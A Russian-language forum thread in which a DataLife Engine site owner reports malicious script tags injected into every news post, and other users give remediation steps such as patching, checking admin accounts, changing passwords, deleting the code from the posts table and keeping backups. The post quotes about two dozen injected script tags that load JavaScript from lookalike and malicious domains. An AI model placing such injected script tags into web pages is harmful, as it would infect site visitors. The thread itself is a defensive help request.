Вредоносный код в кратких и полных новостях

[martins 0]

Версия DataLife Engine: 8.3 сайт http://******/

на днях Яндекс выдал строку что мой сайт http://********/ несет угрозу и может заразить компьютер.

После просмотра исходного кода, было обдаружено присутствие инородного кода в кадой краткой и полной новости. везде разные коды, к прримеру одна новость:

В кратком варианте новости:

<script src="http://googglle.org/3867d45b774c9bdcbca1b3b2a383e667.js" type="text/javascript"></script>

<script src="http://topkek.org/c1ce69a9c87d5b9aef0f275dece517b4.js" type="text/javascript"></script>

<script src="http://goooglle.org/3eabd791a9e4dc456449cea29c78ee6c.js" type="text/javascript"></script>

<script src="http://topkek.org/3badd938b211104ef5e6204674731f29.js" type="text/javascript"></script>

<script src="http://foxrex.org/40e0ef18c600a2f75443479e20725080.js" type="text/javascript"></script>

<script src="http://broxet.org/cfee38f369c1b860d40d8a949d458886.js" type="text/javascript"></script>

<script src="http://picturevk.msk.ru/e8538056b3ffeac77f77a2f31b1669b9.js" type="text/javascript"></script>

<script src="http://mypic.msk.ru/43871a453f68615e78e3ea2c3e57232d.js" type="text/javascript"></script>

<script src="http://mypic.msk.ru/57b904284f674828dd09306957ee97ba.js" type="text/javascript"></script>

<script src="http://shopik4you.msk.ru/c28eb092899a2854e6039b5f9aaef86c.js" type="text/javascript"></script>

<script src="http://shopik4you.msk.ru/6f8d5628967e18ff378756e6ca5059f6.js" type="text/javascript"></script>

<script src="http://masket.org/42b83b0f57e9d6ad73efebe83dfe3db2.js" type="text/javascript"></script>

В полном варианте новости:

<script src="http://googglle.org/54a52341e372001fbaeb134a7246783f.js" type="text/javascript"></script>

<script src="http://topkek.org/e8c1fa2b8e5d10866fab5fb6e77c3b46.js" type="text/javascript"></script>

<script src="http://goooglle.org/b39b6c8269b5f7c74248943963e910ed.js" type="text/javascript"></script>

<script src="http://topkek.org/f46ad1a463828c8b99f9d6f0187bf5a0.js" type="text/javascript"></script>

<script src="http://foxrex.org/fb252af632aa0b12a01d4606eecd00c1.js" type="text/javascript"></script>

<script src="http://broxet.org/63bb07e1a9eca8938a9ff80595ad39c0.js" type="text/javascript"></script>

<script src="http://picturevk.msk.ru/1b6a650d261e6df6cd687e3e302ca3ad.js" type="text/javascript"></script>

<script src="http://mypic.msk.ru/576f00e543af53039bfaeec09ddf1d39.js" type="text/javascript"></script>

<script src="http://mypic.msk.ru/14a94e7afad4d0884d02b08323ee9abc.js" type="text/javascript"></script>

<script src="http://shopik4you.msk.ru/810719f51ff7af3b20b559d70fe2d43f.js" type="text/javascript"></script>

<script src="http://shopik4you.msk.ru/28b5901f47f14853c5f1d4b69de95799.js" type="text/javascript"></script>

<script src="http://masket.org/847525cc6e45b48b8552473cdb863a14.js" type="text/javascript"></script>

И так в каждой посту, меняется лишь вот эта часть 54a52341e372001fbaeb134a7246783f.js

Коды эти находятся непосредственоо в самой статье (в базе) а не в шаблоне.

Кто сталкивался с таким и как решать проблему?

[Taganay 27]

Вредоносный код мог быть в "левых" шаблонах.

[martins 0]

Шаблон делался, собственноручно

[celsoft 6 076]

martins,

На вашем сайте не установлены патчи безопасности http://dle-news.ru/bags/ которые вышли еще полгода назад и ранее. В частности не установлен патч http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html Теперь вам нужно ставить патч, скачивать БД, и удалять этот код из БД потом восстанавливать БД обратно. Также менять все пароли, проверять встроенным антивирусом в админпанели и удалять все посторонние файлы на которые он укажет

Сссылку на ваш сайт удалил, он уязвим.

[martins 0]

Вчера утром сделал установку патчей, почистил базу.

Сегодня снова начал появлятся этот код только уже не целый список, а один <script src="http://masket.org/....js" type="text/javascript"></script> во всех постах, в томже месте

Какие файлы на сервере нужно ремонтировать, или что делать дальше?

[prikindel 255]

на форуме есть несколько подобных тем с пошаговой инструкцией как исправить.

Попробуй воспользоваться поиском.

боритесь со своей ленью, надоело уже видеть одно и то же.

[Egiptyanin 23]

Вчера утром сделал установку патчей, почистил базу.

Сегодня снова начал появлятся этот код только уже не целый список, а один <script src="http://masket.org/....js" type="text/javascript"></script> во всех постах, в томже месте

Какие файлы на сервере нужно ремонтировать, или что делать дальше?

1. Посмотреть нет ли лишнего юзера с правами админа, так же посмотреть списки редакторов, журналистов, посмотреть права гостей и обычных пользователей. Проверять на предмет доступа к админке, правке новостей.В правах групп.

2. Проверить файлы, включая шаблон, на наличие лишнего кода. Антивирус ДЛЕ с этим неплохо справляется, но можно и вручную.

3. Сменить все пароль - для портала, для доступа на фтп, для доступа к базе данных, для доступа в админпанель хостинга

4. Поиск в базе данных, таблица кажись dle_post (не помню по памяти, в общем таблица с новостями, ввести в поиск кусок <script src="http://masket.org/....js" type="text/javascript"></script>, найти и удалить из всех новостей.

5. Бекапить базу данных, или вообще весь сайт раз в сутки.Утром проснулся-зашел-забекапил-спокойно живешь дальше. Базу можно бекапит прямо из админки портала, полный архив, включающий в себя БД и файлы можно сделать из админпанели хостинга (cpanel, directadmin и т.д.), если эта опция включена провайдером. У 99% включена и поддерживается.

Так же при взломе сайта, если нет бэкапа, всегда можно обратится к провайдеру. Если провайдер нормальный (не Вася667 из 2го подъезда г. Урюпинска, предложивший хостинг,н за 2 рубля), то у него раз в сутки/двое/трое снимается бекап всех сайтов и лежит на отдельном сервере. ,